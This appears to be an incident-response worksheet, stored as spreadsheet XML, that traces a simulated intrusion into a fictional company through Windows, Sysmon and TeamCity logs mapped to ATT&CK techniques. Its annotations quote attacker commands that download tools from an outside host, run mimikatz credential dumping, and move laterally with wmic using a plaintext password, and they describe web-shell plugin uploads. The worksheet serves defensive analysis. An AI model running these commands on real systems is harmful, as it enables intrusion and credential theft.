    <t>Windows defender stops Process Tampering - launching cmd from FS-01 directly from explorer and presumably editing something in C:\WINDOWS\Temp</t>
  </si>
  <si>
    <t>RuleName: -
UtcTime: 2024-05-30 09:35:46.605
ProcessGuid: {ca68c618-444a-6658-2402-000000001000}
ProcessId: 2872
Image: \\TTK-FS-01\Code\systoolkit\cmd.exe
TargetFilename: C:\Windows\Temp\mstrc.exe
CreationUtcTime: 2024-05-30 09:35:46.605
User: techtonik\scavo.divya</t>
  </si>
  <si>
    <t xml:space="preserve"> C:\Windows\Temp\mstrc.exe created</t>
  </si>
  <si>
    <t>function Get-DKMKey {
    Import-Module ActiveDirectory
    # Function to get the DKM Key</t>
  </si>
  <si>
    <t>iwr http://downloads.yxz.red:8080/SearchIndexer.exe -OutFile SearchIndexer.exe</t>
  </si>
  <si>
    <t>mimikatz run masquerading as SearchIndexer.exe :</t>
  </si>
  <si>
    <t>Process accessed:
RuleName: technique_id=T1003,technique_name=Credential Dumping
UtcTime: 2024-05-31 10:47:03.840
SourceProcessGUID: {bc9dcbae-aa50-6659-a201-000000000e00}
SourceProcessId: 4028
SourceThreadId: 5576
SourceImage: C:\Windows\Temp\SearchIndexer.exe
TargetProcessGUID: {bc9dcbae-a20a-6659-0c00-000000000e00}
TargetProcessId: 656
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a00b4|C:\Windows\System32\KERNELBASE.dll+2751e|C:\Windows\Temp\SearchIndexer.exe+c291e|C:\Windows\Temp\SearchIndexer.exe+c4501|C:\Windows\Temp\SearchIndexer.exe+c4394|C:\Windows\Temp\SearchIndexer.exe+85a44|C:\Windows\Temp\SearchIndexer.exe+8587c|C:\Windows\Temp\SearchIndexer.exe+85647|C:\Windows\Temp\SearchIndexer.exe+c97a5|C:\Windows\System32\KERNEL32.DLL+17ac4|C:\Windows\SYSTEM32\ntdll.dll+5a4e1
S\</t>
  </si>
  <si>
    <t>mimikatz credential dumping from lsass.exe</t>
  </si>
  <si>
    <t>sharpchrome.exe masqueraded</t>
  </si>
  <si>
    <t>function Get-DKMKey</t>
  </si>
  <si>
    <t>security 4662</t>
  </si>
  <si>
    <t xml:space="preserve">An operation was performed on an object.
Subject :
	Security ID:		S-1-5-21-1732287905-1419500290-3997047612-1116
	Account Name:		aadcsvc$
	Account Domain:		techtonik
	Logon ID:		0x566D7D
Object:
	Object Server:		DS
	Object Type:		%{5cb41ed0-0e4c-11d0-a286-00aa003049e2}
	Object Name:		%{82620ea6-51fe-4ddf-8630-ac2425028ec3}
	Handle ID:		0x0
Operation:
	Operation Type:		Object Access
	Accesses:		Read Property
	Access Mask:		0x10
	Properties:		Read Property
		{77b5b886-944a-11d1-aebd-0000f80367c1}
			{8d3bca50-1d7e-11d0-a081-00aa006c33ed}
	{5cb41ed0-0e4c-11d0-a286-00aa003049e2}
Additional Information:
	Parameter 1:		-
	Parameter 2:	</t>
  </si>
  <si>
    <t>aadcsvc$ retrieves DKM key</t>
  </si>
  <si>
    <t>DESKTOP-WAIFU attempts to authenticate to TTK-PC-01 with stanley.eugene</t>
  </si>
  <si>
    <t>DESKTOP-WAIFU attempts to authenticate to TTK-FS-01 with stanley.eugene</t>
  </si>
  <si>
    <t>likely the real stanley.eugene logs on from home to TTK-PC-01</t>
  </si>
  <si>
    <t>stanley.eugene logon type 3 from ttk-dev-01 to FS-01</t>
  </si>
  <si>
    <t>stanley eugene's real desktop?</t>
  </si>
  <si>
    <t>certutil.exe -urlcache -f http://downloads.yxz.red:8080/SearchIndexer.exe C:\Code\systoolkit\SearchIndexer.exe</t>
  </si>
  <si>
    <t>.\SearchIndexer.exe  "privilege::debug"</t>
  </si>
  <si>
    <t>SearchIndexer.exe  privilege::debug sekurlsa::logonpasswords</t>
  </si>
  <si>
    <t>A service was installed in the system.
Subject:
	Security ID:		S-1-5-18
	Account Name:		TTK-FS-01$
	Account Domain:		techtonik
	Logon ID:		0x3E7
Service Information:
	Service Name: 		debug_service
	Service File Name:	C:\Code\systoolkit\cmd.exe
	Service Type: 		0x10
	Service Start Type:	2
	Service Account: 		LocalSystem</t>
  </si>
  <si>
    <t>service installed debug_service</t>
  </si>
  <si>
    <t>Security 4624</t>
  </si>
  <si>
    <t>lindon.renae NTLM 3 from DESKTOP-SPLOITS 10.0.2.5</t>
  </si>
  <si>
    <t>attacker PING TTK-SQL-01, receives reply 10.0.2.6</t>
  </si>
  <si>
    <t>Security 4689</t>
  </si>
  <si>
    <t>attacker exits shell on TTK-FS-01</t>
  </si>
  <si>
    <t>attacker c2 callout from systoolkit\cmd.exe</t>
  </si>
  <si>
    <t>Network connection detected:
RuleName: technique_id=T1021,technique_name=Remote Services
UtcTime: 2024-05-27 21:50:34.092
ProcessGuid: {2a2df5be-fd48-6654-e30b-000000000d00}
ProcessId: 6728
Image: C:\Code\systoolkit\rr.exe
User: NT AUTHORITY\SYSTEM
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 10.0.2.5
SourceHostname: -
SourcePort: 59343
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 10.0.2.6
DestinationHostname: -
DestinationPort: 3389
DestinationPortName: -</t>
  </si>
  <si>
    <t>attacker uses chisel to RDP/proxy from TTK-FS-01 to TTK-SQL-01</t>
  </si>
  <si>
    <t xml:space="preserve">lindon.renae user32 10 from TTK-SQL-01 10.0.2.5 </t>
  </si>
  <si>
    <t>lindon.renae NTLM 3 from DESKTOP-SPLOITS 10.0.2.5 (pivoted from TTK-FS-01)</t>
  </si>
  <si>
    <t xml:space="preserve">A service was installed in the system.
`
Service Name:  58MSKSSJ
Service File Name:  C:\Windows\Temp\gdrv.sys
Service Type:  kernel mode driver
Service Start Type:  auto start
Service Account:  </t>
  </si>
  <si>
    <t>ttkadmin prompt</t>
  </si>
  <si>
    <t>lindon.renae prompt</t>
  </si>
  <si>
    <t>sumatraPDF -&gt; cmd.exe - &gt; wmic: /c wmic /node:"TTK-PC-01" process call create "cmd.exe /c mkdir C:\\Code"</t>
  </si>
  <si>
    <t>loginov.yannis accesses TTK-FS-01 from 10.0.3.5</t>
  </si>
  <si>
    <t>DNS query for downloads.yxz.red</t>
  </si>
  <si>
    <t>loginov.yannis accesses cmd.exe searchindexer.exe msrdc.exe and rr.exe</t>
  </si>
  <si>
    <t>Subject:
	Security ID:		S-1-5-21-1732287905-1419500290-3997047612-1109
	Account Name:		loginov.yannis
	Account Domain:		techtonik
	Logon ID:		0x4A6B7B6
Network Information:	
	Object Type:		File
	Source Address:		10.0.3.5
	Source Port:		61140
Share Information:
	Share Name:		\\*\Code
	Share Path:		\??\C:\Code
	Relative Target Name:	systoolkit\cmd.exe
Access Request Information:
	Access Mask:		0x120089
	Accesses:		READ_CONTROL
				SYNCHRONIZE
				ReadData (or ListDirectory)
				ReadEA
				ReadAttributes
Access Check Results:
	READ_CONTROL:	Granted by	D:(A;OICI;FA;;;WD)
				SYNCHRONIZE:	Granted by	D:(A;OICI;FA;;;WD)
				ReadData (or ListDirectory):	Granted by	D:(A;OICI;FA;;;WD)
				ReadEA:	Granted by	D:(A;OICI;FA;;;WD)
				ReadAttributes:	Granted by	D:(A;OICI;FA;;;WD)</t>
  </si>
  <si>
    <t>Security 5145</t>
  </si>
  <si>
    <t>500+ connections from C:\Code\systoolkit\cmd.exe to attacker IP 44.222.89.156:443 over ephermeral source ports</t>
  </si>
  <si>
    <t>Sysmon 11</t>
  </si>
  <si>
    <t>techtonik\lindon.renae
File created:
RuleName: -
UtcTime: 2024-05-27 22:50:57.195
ProcessGuid: {bc9dcbae-0e16-6655-8d17-000000000d00}
ProcessId: 2600
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Code\systoolkit\Word.exe
CreationUtcTime: 2024-05-27 22:50:57.195
User: techtonik\lindon.renae</t>
  </si>
  <si>
    <t>C:\Code\systoolkit\Word.exe created</t>
  </si>
  <si>
    <t>Sysmon 1</t>
  </si>
  <si>
    <t>mkdir systoolkit</t>
  </si>
  <si>
    <t>Special privileges assigned to new logon.
Subject:
	Security ID:		S-1-5-21-1732287905-1419500290-3997047612-1126
	Account Name:		lindon.renae
	Account Domain:		techtonik
	Logon ID:		0x7EF2331
Privileges:		SeSecurityPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeTakeOwnershipPrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeLoadDriverPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
			SeEnableDelegationPrivilege</t>
  </si>
  <si>
    <t>lindon renae sign in special privilege windows 4672</t>
  </si>
  <si>
    <t>Security 4672</t>
  </si>
  <si>
    <t>Special privileges assigned to new logon.
Subject:
	Security ID:		S-1-5-21-1732287905-1419500290-3997047612-500
	Account Name:		ttkadmin
	Account Domain:		techtonik
	Logon ID:		0x3B3C8F3
Privileges:		SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeSystemEnvironmentPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege</t>
  </si>
  <si>
    <t>ttkadmin priv user login</t>
  </si>
  <si>
    <t>Security 4776</t>
  </si>
  <si>
    <t>Auth success for lindon.renae from DESKTOP-SPLOITS 10.0.2.5 (TTK-FS-01)</t>
  </si>
  <si>
    <t>lindon.renae type 3 kerberos logon from 10.0.3.4</t>
  </si>
  <si>
    <t>user logon lindon.renae from 10.0.2.5 type 3 over NTLM</t>
  </si>
  <si>
    <t>Explorer.exe -&gt; powershell.exe (current dir C:Code)</t>
  </si>
  <si>
    <t>user logon lindon.renae from 10.0.3.4 type 3 over kerberos</t>
  </si>
  <si>
    <t>possibly real lindon</t>
  </si>
  <si>
    <t>iwr http://downloads.yxz.red:8080/office/Word.exe -OutFile Word.exe</t>
  </si>
  <si>
    <t>/c wmic /node:"TTK-PC-02" /user:"TECHTONIK\scavo.divya" /password:"i.BHs_Pqd9vT@GpZ" process call create "cmd.exe /c copy \\TTK-FS-01\Code\systoolkit\cmd.exe C:\Code\cmd.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">scavo.divya accesses files on TTK-FS-01 </t>
  </si>
  <si>
    <t>C:\Windows\system32\Robocopy.exe C:\Temp\DocsBackup.rar \\TTK-FS-01\Code\</t>
  </si>
  <si>
    <t>copy from TTK-FS-01 to TTK-DEV-01</t>
  </si>
  <si>
    <t>cd FSCode/ cp DocsBackup.rar /tmp/</t>
  </si>
  <si>
    <t>stanley.eugene</t>
  </si>
  <si>
    <t>teamcity</t>
  </si>
  <si>
    <t>44.222.89.156 - - [25/May/2024:01:08:56 +0000] "POST /plugins/deQch48D/deQch48D.jsp HTTP/1.1" 200 4 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"</t>
  </si>
  <si>
    <t>end of connections</t>
  </si>
  <si>
    <t>parent: word.exe</t>
  </si>
  <si>
    <t>POST 200 /hellofriends?jsp=/app/rest/users/id:22/tokens/BDLsFdpRqt;.jsp</t>
  </si>
  <si>
    <t>POST 200 /hellofriends?jsp=/app/rest/users/id:21/tokens/FwdvC9ue4G;.jsp</t>
  </si>
  <si>
    <t>/plugins/827RfVqq/827RfVqq.jsp</t>
  </si>
  <si>
    <t>INFO - s.buildServer.ACTIVITIES.AUDIT - plugin_uploaded: Plugin "827RfVqq" was updated by "user with id=22" with comment "Plugin was uploaded to /home/teamcity/.BuildServer/plugins/827RfVqq.zip"</t>
  </si>
  <si>
    <t>/home/teamcity/build/TeamCity/logs/teamcity-server.log</t>
  </si>
  <si>
    <t>INFO - lugins.impl.PluginUploaderImpl - New plugin at path '/home/teamcity/.BuildServer/plugins/deQch48D.zip' (modified: 2024-05-25 01:03:12.490, size: 1.87 KB) was uploaded. The plugin will become available after TeamCity server restart or could be loaded by administrator from UI.</t>
  </si>
  <si>
    <t>INFO - s.buildServer.ACTIVITIES.AUDIT - plugin_uploaded: Plugin "deQch48D" was updated by "user with id=21" with comment "Plugin was uploaded to /home/teamcity/.BuildServer/plugins/deQch48D.zip"</t>
  </si>
  <si>
    <t>Attacker achieves shell and starts sending commands via /plugins/deQch48D/deQch48D.jsp</t>
  </si>
  <si>
    <t>last command observed via the web shell</t>
  </si>
  <si>
    <t>INFO - tbrains.buildServer.ACTIVITIES - New user created: user with id=22</t>
  </si>
  <si>
    <t>Walkthrough Segment</t>
  </si>
  <si>
    <t>Exploiting TeamCity</t>
  </si>
  <si>
    <t>Walkthrough Question</t>
  </si>
  <si>
    <t>Service installed on system: IWDinCML - qcBlRiAm.exe
A service was installed in the system.
Subject:
	Security ID:		S-1-5-21-1732287905-1419500290-3997047612-1121
	Account Name:		stanley.eugene
	Account Domain:		techtonik
	Logon ID:		0x1354B09
Service Information:
	Service Name: 		IWDinCML
	Service File Name:	\\127.0.0.1\Code\\qcBlRiAm.exe
	Service Type: 		0x10
	Service Start Type:	3
	Service Account: 		LocalSystem</t>
  </si>
  <si>
    <t>A service was installed in the system: rsAvaFuG - LZbNNNSK.exe
Subject:
	Security ID:		S-1-5-21-1732287905-1419500290-3997047612-1121
	Account Name:		stanley.eugene
	Account Domain:		techtonik
	Logon ID:		0x15230B0
Service Information:
	Service Name: 		rsAvaFuG
	Service File Name:	\\127.0.0.1\Code\\LZbNNNSK.exe
	Service Type: 		0x10
	Service Start Type:	3
	Service Account: 		LocalSystem</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>Word.exe spawning child process cmd (tampered word.exe?)</t>
  </si>
  <si>
    <t>Getting the Goods Out</t>
  </si>
  <si>
    <t>Golden SAML</t>
  </si>
  <si>
    <t>Dumping Credentials</t>
  </si>
  <si>
    <t>Signed Drivers and EDRSandblast</t>
  </si>
  <si>
    <t>DLL Hijacking</t>
  </si>
  <si>
    <t>Setting up the Network for Attack</t>
  </si>
  <si>
    <t>Discovering TechTonik</t>
  </si>
  <si>
    <t>Pivoting into the Environment</t>
  </si>
  <si>
    <t xml:space="preserve">SYSTEM edits registry to enable Restricted Admin mode </t>
  </si>
  <si>
    <t>File created:
RuleName: -
UtcTime: 2024-05-27 22:11:44.070
ProcessGuid: {bbf0819c-048b-6655-8709-000000000a00}
ProcessId: 7832
Image: C:\Users\lindon.renae\AppData\Local\SumatraPDF\SumatraPDF.exe
TargetFilename: C:\Windows\Temp\LockApp.exe
CreationUtcTime: 2024-05-27 22:11:44.070
User: techtonik\lindon.renae</t>
  </si>
  <si>
    <t>File created by sumatrapdf.exe C:\Windows\Temp\LockApp.exe</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application (T1190)</t>
  </si>
  <si>
    <t>Ingress Tool Transfer (T1105)</t>
  </si>
  <si>
    <t>INFO - s.buildServer.ACTIVITIES.AUDIT - user create: User "user with id=21" was created by "user with id=21"</t>
  </si>
  <si>
    <t>System Owner/User Discovery (T1033), System Network Connections Discovery (T1049)</t>
  </si>
  <si>
    <t>System Information Discovery (T1082)</t>
  </si>
  <si>
    <t>attempted to transfer over certutil</t>
  </si>
  <si>
    <t>Modify Registry (T1112)</t>
  </si>
  <si>
    <t>System Network Connections Discovery (T1049)</t>
  </si>
  <si>
    <t>Internal Proxy (T1090.001), Remote Desktop Protocol T1021.001)</t>
  </si>
  <si>
    <t>Create Account (T1136), Valid Accounts: Local Accounts (T1078.003)</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Unix Shell (T1059.004)</t>
  </si>
  <si>
    <t>Valid Accounts: Domain Accounts (T1078.002)</t>
  </si>
  <si>
    <t>System Services: Service Execution (T1569.002)</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application (T1190), Obfuscated Files or Information: Command Obfuscation (T1027.010)</t>
  </si>
  <si>
    <t>Hijack Execution Flow: DLL Side-Loading (T1574.002)</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory (T1003.001)</t>
  </si>
  <si>
    <t>Impair Defences: Disable or Modify Tools (T1562.001)</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell (T1059.001)</t>
  </si>
  <si>
    <t>Application Layer Protocol: Web Protocols (T1071.001)</t>
  </si>
  <si>
    <t>Proxy: Internal Proxy (T1090.001)</t>
  </si>
  <si>
    <t>Create or Modify System Process: Windows Service (T1543.003)</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory (T1003.001), Impair Defences: Disable or Modify Tools (T1562.001)</t>
  </si>
  <si>
    <t>Indicator Removal: File Deletion (T1070.004)</t>
  </si>
  <si>
    <t>Data Staged: Local Data Staging (T1074.001)</t>
  </si>
  <si>
    <t>OS Credential Dumping: Security Account Manager (T1003.002)</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSA Secrets (T1003.004)</t>
  </si>
  <si>
    <t>legitimate user accidentally accessing tools?</t>
  </si>
  <si>
    <t>Data Staged: Local Data Staging (T1074.001), Archive Collected Data: Archive via Utility (T1560.001)</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Windows Command Shell (T1059.003)</t>
  </si>
  <si>
    <t>Windows Management Instrumentation (T1047), Process Discovery (T1057)</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Windows Command Shell (T1059.003), Windows Management Instrumentation (T1047)</t>
  </si>
  <si>
    <t>Lateral Tool Transfer (T1570), Command and Scripting Interpreter: Windows Command Shell (T1059.003), Windows Management Instrumentation (T1047)</t>
  </si>
  <si>
    <t>Forge Web Credentials: SAML Tokens (T1606.002)</t>
  </si>
  <si>
    <t>Steal Web Session Cookie (T1539)</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Credentials from Web Browsers (T1555.003)</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell (T1059.001), Command and Scripting Interpreter: PowerShell (T1059.001)</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Unix Shell (T1059.004), Command and Scripting Interpreter: JavaScript (T1059.007)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</si>
</sst>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h:mm:ss"/>
    <numFmt numFmtId="165" formatCode="m\-d"/>
    <numFmt numFmtId="166" formatCode="yyyy&quot;-&quot;mm&quot;-&quot;dd&quot;T&quot;hh&quot;:&quot;mm&quot;:&quot;ss&quot;Z&quot;"/>
    <numFmt numFmtId="167" formatCode="m/d"/>
    <numFmt numFmtId="168" formatCode="m&quot;/&quot;d"/>
    <numFmt numFmtId="169" formatCode="yyyy/mm/dd\ h:mm:ss"/>
  </numFmts>
  <fonts count="23">
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF17375E"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color theme="10"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color theme="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial Unicode MS"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Arial"/>
    </font>
  </fonts>
  <fills count="12">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF434343"/>
        <bgColor rgb="FF434343"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF000000"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF666666"/>
        <bgColor rgb="FF666666"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDA372A"/>
        <bgColor rgb="FFDA372A"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEFEFEF"/>
        <bgColor rgb="FFEFEFEF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor rgb="FFEFEFEF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor rgb="FF666666"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor rgb="FFDA372A"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="2" tint="-0.499984740745262"/>
        <bgColor rgb="FFDA372A"/>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style="thin">
        <color rgb="FF000000"/>
      </right>
      <top/>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="3">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="203">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="164" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="14" fontId="7" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="7" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="165" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="49" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="166" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="164" fontId="7" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="166" fontId="7" fillId="5" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="167" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="166" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="167" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="10" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="166" fontId="10" fillId="5" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
